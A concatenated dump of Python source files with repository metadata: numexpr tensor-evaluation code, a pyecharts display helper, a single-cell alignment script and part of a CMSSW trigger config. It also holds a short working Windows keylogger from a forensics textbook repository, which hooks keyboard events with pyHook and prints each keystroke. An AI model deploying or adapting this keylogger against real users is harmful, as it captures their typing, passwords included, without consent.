except Exception as e:
raise RuntimeError(
f"Failed to evaluate numexpr {repr(expr)} on local dict {local_dict}."
) from e
res = _maybe_keepdims(chunk, res)
if chunk.ndim == 0 and res.ndim == 1 and res.size == 0:
res = res.dtype.type(0)
ctx[chunk.key] = res
# execution part
NE_UNARYOP_TO_STRING = {
arithmetic.TensorNegative: "-",
arithmetic.TensorAbs: "abs",
arithmetic.TensorConj: "conj",
arithmetic.TensorExp: "exp",
arithmetic.TensorLog: "log",
arithmetic.TensorLog10: "log10",
arithmetic.TensorExpm1: "expm1",
arithmetic.TensorLog1p: "log1p",
arithmetic.TensorSqrt: "sqrt",
arithmetic.TensorSin: "sin",
arithmetic.TensorCos: "cos",
arithmetic.TensorTan: "tan",
arithmetic.TensorArcsin: "arcsin",
arithmetic.TensorArccos: "arccos",
arithmetic.TensorArctan: "arctan",
arithmetic.TensorSinh: "sinh",
arithmetic.TensorCosh: "cosh",
arithmetic.TensorTanh: "tanh",
arithmetic.TensorArcsinh: "arcsinh",
arithmetic.TensorArccosh: "arccosh",
arithmetic.TensorArctanh: "arctanh",
arithmetic.TensorFloor: "floor",
arithmetic.TensorCeil: "ceil",
arithmetic.TensorNot: "~",
}
NE_BINOP_TO_STRING = {
arithmetic.TensorAdd: "+",
arithmetic.TensorSubtract: "-",
arithmetic.TensorMultiply: "*",
arithmetic.TensorDivide: "/",
arithmetic.TensorMod: "%",
arithmetic.TensorPower: "**",
arithmetic.TensorLshift: "<<",
arithmetic.TensorRshift: ">>",
arithmetic.TensorEqual: "==",
arithmetic.TensorNotEqual: "!=",
arithmetic.TensorLessThan: "<",
arithmetic.TensorLessEqual: "<=",
arithmetic.TensorGreaterThan: ">",
arithmetic.TensorGreaterEqual: ">=",
arithmetic.TensorAnd: "and",
arithmetic.TensorOr: "or",
}
NE_TREE_OP_TO_STRING = {
arithmetic.TensorTreeAdd: "+",
arithmetic.TensorTreeMultiply: "*",
}
NE_REDUCTION_TO_STRING = {
reduction.TensorSum: "sum",
reduction.TensorProd: "prod",
reduction.TensorMax: "max",
reduction.TensorMin: "min",
}
class _Default(dict):
def __missing__(self, key):
return f"{{{key}}}"
def _handle_unary(chunk):
if len(chunk.inputs) != 1:
        raise ValueError("unary operand should have exactly 1 input")
data = chunk.inputs[0]
unary_op = NE_UNARYOP_TO_STRING[type(chunk.op)]
return f"{unary_op}({{{data.key}}})"
def _decompose(chunk):
expr = f"{{{chunk.key}}}"
for node in reversed(chunk.composed):
_expr = _evaluate(node)
expr = expr.format_map(_Default([(node.key, f"({_expr})")]))
return expr
def _handle_bin(chunk):
op = chunk.op
lhs = str(op.lhs) if np.isscalar(op.lhs) else f"{{{op.lhs.key}}}"
rhs = str(op.rhs) if np.isscalar(op.rhs) else f"{{{op.rhs.key}}}"
reverse = getattr(op, "reverse", False)
op = NE_BINOP_TO_STRING[type(op)]
if reverse:
exprs = [rhs, lhs]
else:
exprs = [lhs, rhs]
return op.join(exprs)
def _handle_tree(chunk):
op = NE_TREE_OP_TO_STRING[type(chunk.op)]
return op.join(f"{{{c.key}}}" for c in chunk.inputs)
def _wrap_bool(data):
if data.dtype == np.bool_:
return f"where({{{data.key}}}, 1, 0)"
return f"{{{data.key}}}"
def _handle_reduction(chunk):
ax = chunk.op.axis
data = chunk.inputs[0]
op_str = NE_REDUCTION_TO_STRING[type(chunk.op)]
# TODO(hks): delete it if numexpr.sum fixed
if len(ax) == data.ndim:
return f"{op_str}({_wrap_bool(data)})"
elif len(ax) == 1:
return f"{op_str}({_wrap_bool(data)},axis={ax[0]})"
else:
raise ValueError("numexpr cannot encode axis")
def _evaluate(chunk):
op_type = type(chunk.op)
if op_type in NE_UNARYOP_TO_STRING:
return _handle_unary(chunk)
elif op_type in NE_BINOP_TO_STRING:
return _handle_bin(chunk)
elif op_type in NE_TREE_OP_TO_STRING:
return _handle_tree(chunk)
elif op_type in NE_REDUCTION_TO_STRING:
return _handle_reduction(chunk)
elif op_type is TensorNeFuseChunk:
return _decompose(chunk)
else:
raise TypeError(f"unsupported operator in numexpr: {op_type.__name__}")
def _maybe_keepdims(chunk, res):
out_chunk = chunk.composed[-1] if type(chunk.op) == TensorNeFuseChunk else chunk
if type(out_chunk.op) in NE_REDUCTION_TO_STRING and out_chunk.op.keepdims:
res = np.reshape(res, out_chunk.shape)
return res
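# Worked example (not part of the original module; keys and arrays are made up): for a
# fused chunk whose composed graph is sqrt(a + b), _evaluate() renders the graph to
# roughly "(sqrt(({a.key}+{b.key})))" via _decompose/_handle_unary/_handle_bin;
# execute() then maps every input key to a stable placeholder through key_to_var, so the
# string handed to numexpr.evaluate becomes "(sqrt((V_0+V_1)))" with
# local_dict={"V_0": <ndarray for a>, "V_1": <ndarray for b>}.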
|
6bc8b1f6a8962e3ace644225156bc9a80829948d
|
3ccb023412acb22646d0132e25c41720e1522e1f
|
/Chapter 10/simple_keylogger.py
|
ae3eea636293f0561d9fb94e6a7a87e58a477dd7
|
[] |
no_license
|
PacktPublishing/Learning-Python-for-Forensics
|
dfecefcb686d5b1acdb861f2832b2a0edffaf140
|
4ca1e5601e7672f5b80d6109bafff81b6c359f49
|
refs/heads/master
| 2023-02-06T17:15:50.186542
| 2023-01-30T08:32:59
| 2023-01-30T08:32:59
| 60,173,644
| 104
| 56
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 654
|
py
|
simple_keylogger.py
|
import pythoncom,pyHook
def OnKeyboardEvent(event):
"""
Process keyboard event
"""
    if event.Ascii != 0 and event.Ascii != 8:  # Skip Null & Backspace
        if event.Ascii == 13:  # Handle an 'Enter' key press
            keylogs = '<return>'
        else:
            keylogs = chr(event.Ascii)
        print keylogs,
    return True  # let pyHook pass the event on to other handlers (a falsy return would swallow the keystroke)
# Create a hook manager object
hm=pyHook.HookManager()
try:
    # Set function for keystroke processing
hm.KeyDown = OnKeyboardEvent
except (TypeError, KeyboardInterrupt):
    pass  # Allow us to ignore errors that would cause the code to exit
# Set the hook
hm.HookKeyboard()
# Wait forever
pythoncom.PumpMessages()
|
c9749bc4cecf9be0ba723e814e459eb93c35130f
|
458518b66f3628f9e80d98aa718dec7bb1bc79a7
|
/pyecharts/render/display.py
|
78c93e2a084c6eeef0dd40b6a8348598fff81351
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
pyecharts/pyecharts
|
e40f4829f6edeb85f76008cebbc5a1557f35db19
|
f92c839a51d3878eeb24504ad191706c9db2c2ed
|
refs/heads/master
| 2023-09-01T07:32:21.285521
| 2023-08-21T03:59:26
| 2023-08-21T03:59:26
| 95,067,884
| 12,973
| 2,786
|
MIT
| 2023-08-25T05:44:08
| 2017-06-22T02:50:25
|
Python
|
UTF-8
|
Python
| false
| false
| 2,364
|
py
|
display.py
|
from ..types import Optional, Sequence, Union
from urllib.parse import urlparse
import http.client
class HTML:
def __init__(self, data: Optional[str] = None):
self.data = data
def _repr_html_(self):
return self.data
def __html__(self):
return self._repr_html_()
_lib_t1 = """new Promise(function(resolve, reject) {
var script = document.createElement("script");
script.onload = resolve;
script.onerror = reject;
script.src = "%s";
document.head.appendChild(script);
}).then(() => {
"""
_lib_t2 = """
});"""
_css_t = """var link = document.createElement("link");
    link.rel = "stylesheet";
link.type = "text/css";
link.href = "%s";
document.head.appendChild(link);
"""
class Javascript:
def __init__(
self,
data: Optional[str] = None,
lib: Optional[Union[str, Sequence]] = None,
css: Optional[Union[str, Sequence]] = None,
):
if isinstance(lib, str):
lib = [lib]
elif lib is None:
lib = []
if isinstance(css, str):
css = [css]
elif css is None:
css = []
self.lib = lib
self.css = css
self.data = data or ""
self.javascript_contents = dict()
def _repr_javascript_(self):
r = ""
for c in self.css:
r += _css_t % c
for d in self.lib:
r += _lib_t1 % d
r += self.data
r += _lib_t2 * len(self.lib)
return r
def load_javascript_contents(self):
for lib in self.lib:
parsed_url = urlparse(lib)
host: str = str(parsed_url.hostname)
port: int = parsed_url.port
path: str = parsed_url.path
resp: Optional[http.client.HTTPResponse] = None
try:
conn = http.client.HTTPSConnection(host, port)
conn.request("GET", path)
resp = conn.getresponse()
if resp.status != 200:
raise RuntimeError("Cannot load JavaScript lib: %s" % lib)
self.javascript_contents[lib] = resp.read().decode("utf-8")
finally:
if resp is not None:
resp.close()
return self
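# Hypothetical usage sketch (not part of the original module; the URL is made up): in a
# Jupyter cell, wrapping a snippet in Javascript makes the front end load the listed
# libraries before running it.
#
#     js = Javascript(
#         data="console.log(typeof echarts);",
#         lib=["https://example.com/echarts.min.js"],
#     )
#     js  # the notebook renders it via _repr_javascript_(), emitting the promise-based loader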
|
0401bfbc6e5aa7085c7c88ac9ed3f5061fc49cad
|
512cc7446bfc05b392ba7e697d316eb00c620c01
|
/bin/fly_brain.py
|
495ec2a448a4ee484f924e895f6f32f2c05e72da
|
[
"MIT"
] |
permissive
|
brianhie/scanorama
|
b4ce1c947b097a5098850aeafa92cb0126791ad1
|
3fbff622d8c6c0122e699e2e72e9ab4e2a531c7f
|
refs/heads/master
| 2022-12-13T05:23:11.764455
| 2022-11-28T18:50:30
| 2022-11-28T18:50:30
| 141,593,152
| 228
| 47
|
MIT
| 2022-11-28T18:48:41
| 2018-07-19T14:43:41
|
Python
|
UTF-8
|
Python
| false
| false
| 1,277
|
py
|
fly_brain.py
|
import numpy as np
from process import load_names, merge_datasets
from scanorama import process_data, find_alignments_table
from time_align import time_align_correlate, time_align_visualize, time_dist
NAMESPACE = 'fly_brain'
data_names = [
'data/fly_brain/DGRP-551_0d_rep1',
'data/fly_brain/DGRP-551_0d_rep2',
'data/fly_brain/DGRP-551_1d_rep1',
'data/fly_brain/DGRP-551_3d_rep1',
'data/fly_brain/DGRP-551_6d_rep1',
'data/fly_brain/DGRP-551_6d_rep2',
'data/fly_brain/DGRP-551_9d_rep1',
'data/fly_brain/DGRP-551_15d_rep1',
'data/fly_brain/DGRP-551_30d_rep1',
'data/fly_brain/DGRP-551_30d_rep2',
'data/fly_brain/DGRP-551_50d_rep1',
]
if __name__ == '__main__':
datasets, genes_list, n_cells = load_names(data_names)
datasets, genes = merge_datasets(datasets, genes_list)
datasets_dimred, genes = process_data(datasets, genes)
_, A, _ = find_alignments_table(datasets_dimred)
time = np.array([ 0, 0, 1, 3, 6, 6, 9, 15, 30, 30, 50 ]).reshape(-1, 1)
time_align_correlate(A, time)
time_dist(datasets_dimred, time)
x = np.array([ 0, 0, 1, 2, 3, 3, 4, 5, 6, 6, 7 ]).reshape(-1, 1)
y = [ -.1, .1, 0, 0, -.1, .1, 0, 0, -.1, .1, 0 ]
time_align_visualize(A, x, y, namespace=NAMESPACE)
|
1576c12531b724098b4938bab203ebc568d50b66
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/L1Trigger/GlobalTriggerAnalyzer/test/L1GtDataFromRawEmulAnalyzer_cfg.py
|
3133a9cb55093a07539170a5586f678e56c045e1
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 73,723
|
py
|
L1GtDataFromRawEmulAnalyzer_cfg.py
|
#
# cfg file for:
#
# Unpack the GCT, GMT and GT data.
# Run the L1 GT emulator on the unpacked GCT and GMT data.
# Compare the GT data records with the GT emulated records
#
import FWCore.ParameterSet.Config as cms
process = cms.Process("RunL1GtDataFromRawEmulAnalyzer")
# number of events and source
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(5000)
)
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:/afs/cern.ch/user/g/ghete/scratch0/CmsswTestFiles/testGt_DataFromRawEmulAnalyzer_source.root')
)
process.PoolSource.fileNames = ['/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/003AD0A3-B51C-DD11-834F-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/020DA07C-9C1C-DD11-8B5C-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/026FFDE2-B71C-DD11-9D4A-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/028925DF-A61C-DD11-BDF1-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0401CDA0-A01C-DD11-9BDB-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0414D38E-9E1C-DD11-A7E5-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/04F62EBD-B91C-DD11-BB9C-001617E30D06.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0696D1C9-A41C-DD11-A411-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A052134-AF1C-DD11-8919-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A60D7DC-A41C-DD11-9075-001617E30CA4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A637587-B31C-DD11-B32A-000423D996C8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0A71AABE-A21C-DD11-A9A1-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C3D3FB1-B11C-DD11-9B38-000423D992DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C4A72B9-B91C-DD11-8A6F-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C60F77C-9C1C-DD11-BC75-001617C3B73A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0C87A74D-9A1C-DD11-A29B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0E34B872-9C1C-DD11-8208-000423D98804.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0E8A89B0-B91C-DD11-8EBA-000423D9939C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/0EF363E9-A61C-DD11-B75F-001617E30CE8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/105F2C89-9E1C-DD11-9D86-001617DBD49A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1211D927-B81C-DD11-91B3-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/121EDD5E-B11C-DD11-AEDE-001D09F23E53.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/12464707-A91C-DD11-B478-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/127649CF-A41C-DD11-B170-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/146566AE-B71C-DD11-A113-001617DC1F70.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1483D99C-B51C-DD11-9274-000423D6CAF2.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/148AB865-B11C-DD11-8B3F-001D09F24E39.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14B76514-AB1C-DD11-BEFA-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14E55CBD-B91C-DD11-A876-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/14F7A391-A01C-DD11-9D9E-001617DC1F70.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1607D3A0-A01C-DD11-9223-001617E30CA4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/16673A21-B81C-DD11-8D6F-001617E30CC8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/18096B2D-AF1C-DD11-A2A2-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/189AC9C5-A41C-DD11-868A-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1A9B278C-A01C-DD11-842F-000423D6CAF2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1AD12186-9E1C-DD11-815A-001617E30D2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1C240A80-9E1C-DD11-99DD-000423D985E4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1C7DCBDA-A61C-DD11-BFCA-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1E24F97C-9C1C-DD11-8921-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/1E9EE338-9A1C-DD11-987A-000423D6A6F4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2021DDD2-A41C-DD11-AAF1-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2064C823-AD1C-DD11-B86F-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/20675D3E-AF1C-DD11-B97D-001617E30D0A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2072E22E-981C-DD11-B7A0-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/209E2E2B-AB1C-DD11-8B0F-000423DC1A0C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/20DFF4BD-A21C-DD11-AAE4-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2201A985-9E1C-DD11-B808-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/22718B76-9C1C-DD11-95E1-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/228D717C-9E1C-DD11-B614-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/22B6FAD7-A41C-DD11-9238-001617DF785A.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/242FCD06-AB1C-DD11-8213-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2445DE33-981C-DD11-A43B-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/26B69B96-A01C-DD11-8FC4-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2812BEEF-B71C-DD11-8F46-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2A2CCCA0-A01C-DD11-93B9-001617DBD556.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2A59E006-A91C-DD11-A82B-000423D99020.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2AB8E6D7-A41C-DD11-9CE5-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2C6D88A5-B51C-DD11-82E3-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2CA386B3-B91C-DD11-BDE5-001617C3B76E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2E3E1A3E-9A1C-DD11-A7CE-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/2E9DA8C2-B91C-DD11-8DE2-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32D12786-9E1C-DD11-847B-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32FB38BC-B91C-DD11-A8E5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/32FD88CF-A41C-DD11-BB80-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3465F6A3-B71C-DD11-814D-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36588B7A-B11C-DD11-8EF1-001D09F24024.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/368E861F-B81C-DD11-B1B3-000423D6101A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36B9546B-B41C-DD11-9F3D-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/36D22616-AB1C-DD11-BFCF-001617E30F46.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/382BA240-AF1C-DD11-AF9F-000423D94C80.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3AA50549-9A1C-DD11-AABD-001617C3B70E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3AD70FB4-A21C-DD11-8A63-000423D6B2D8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3ADAADE1-A61C-DD11-B2AA-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3C096D93-A01C-DD11-B602-000423D6CA6E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3C87B1E8-A61C-DD11-A4F2-000423D996C8.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3CCC829C-A01C-DD11-ACDF-000423D9880C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3E22AFBB-A21C-DD11-AB9B-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/3E7BB98C-A01C-DD11-91C0-000423D6B5C4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/400B2EDA-A61C-DD11-B40A-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/403705CF-A41C-DD11-A0CC-000423D992A4.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/40A83AB4-B91C-DD11-9009-001617DBD5AC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/426D436B-9C1C-DD11-9397-001617C3B614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/42E7BF93-A01C-DD11-B183-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/42FFA897-A01C-DD11-BD31-000423D6A6F4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/442D1EDA-A41C-DD11-99E7-000423D6CAF2.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/44BA378D-A01C-DD11-A315-000423D6B444.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/44BB2D77-9C1C-DD11-BB5A-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/462E23DA-A61C-DD11-8BB4-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48626E2D-AF1C-DD11-AC76-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48746689-9E1C-DD11-8636-0019DB29C5FC.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/487B3F93-A01C-DD11-9494-000423D986A8.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4888D793-A01C-DD11-8015-000423D9870C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48C529D3-A41C-DD11-A339-001617E30F4C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/48CED0AD-B51C-DD11-90F8-001617DBD556.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4A251384-9E1C-DD11-ABCC-001617C3B5D6.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4CB2CE88-B31C-DD11-AFB6-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4CC3CE79-B11C-DD11-9EDA-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/4EFE256E-9C1C-DD11-BB71-000423D992A4.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/50F6304D-9A1C-DD11-B404-000423D985B0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/50F86B89-9E1C-DD11-A8AF-001617E30D06.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52756844-9A1C-DD11-8D8D-001617DBCF90.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52E7ECA0-B51C-DD11-BB37-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/52F22F7D-B31C-DD11-A927-000423D99660.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/54387CBD-A21C-DD11-948C-000423D6B48C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5689BB7C-9C1C-DD11-814E-001617C3B706.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/569DD041-9A1C-DD11-998E-000423D6C8EE.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/56A0A3E6-A61C-DD11-9903-0019DB29C614.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/584C9F03-A91C-DD11-B7CF-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/589FD448-9A1C-DD11-987B-001617C3B6DC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/58D1F7BD-A21C-DD11-868A-001617E30D12.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/58FE98E6-A61C-DD11-8D9F-001617DF785A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5AC19AC4-A21C-DD11-9156-001617E30D40.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5CC7329E-B51C-DD11-9263-001617DC1F70.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5E91438D-9E1C-DD11-84C5-000423D6CA02.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/5EF53351-B81C-DD11-A03E-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/609D941F-AD1C-DD11-9C31-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/60D31125-B81C-DD11-BA96-000423DC1A0C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/60F55A71-9C1C-DD11-B2A5-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/62815270-B31C-DD11-8D5F-001617DBD49A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6286A3CE-A41C-DD11-B778-000423D6CA6E.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/628AC3E4-A61C-DD11-B825-000423D99658.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/628C32BE-A21C-DD11-BF26-001617C3B73A.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/64870171-9C1C-DD11-9446-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/64C37396-A01C-DD11-AC51-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66382D71-B31C-DD11-A1EC-001617E30F46.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66A011A1-A01C-DD11-BB03-001617E30E28.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66BF7047-9A1C-DD11-9E11-001617C3B6CC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/66C6BFDF-A61C-DD11-B38A-000423D94C68.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/68CADF33-AF1C-DD11-B816-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/68F15475-B31C-DD11-9003-000423D99020.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6A447F52-B11C-DD11-ADF5-001617C3B5D6.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6A81039D-A01C-DD11-AB8C-000423D6BA18.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6ADDF69C-B51C-DD11-AACF-000423D9863C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6C22E3A6-A01C-DD11-BF27-001617C3B64C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6C2A4D97-B11C-DD11-8199-001617E30D54.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6CA70D49-9A1C-DD11-A02B-001617DBD540.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6E3BEBE1-A61C-DD11-864F-001617DBCF1E.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/6EDB6407-A91C-DD11-B38D-0016177CA7A0.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/701CC33D-9A1C-DD11-86A0-001617E30E2C.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/70D54482-B11C-DD11-8967-001D09F26C5C.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/70FFC09B-B51C-DD11-B3E3-001617C3B654.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/724E9A61-B11C-DD11-BD5E-000423D94C80.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/72500CBD-B91C-DD11-9808-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/740C169F-B51C-DD11-B13D-000423DD2F34.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/740ECA5B-B11C-DD11-B2E9-001617C3B614.root',
'/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74A18258-AF1C-DD11-95C3-001617E30D54.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74A67AE1-A61C-DD11-BA54-000423D8FA38.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/74F4C19C-B51C-DD11-8E0C-001617C3B652.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/7603B179-9C1C-DD11-B7D4-0019DB29C5FC.root', '/store/data/GlobalCruzet1/A/000/000/000/RAW/0006/76867668-9C1C-DD11-B5ED-000423D6AF24.root',
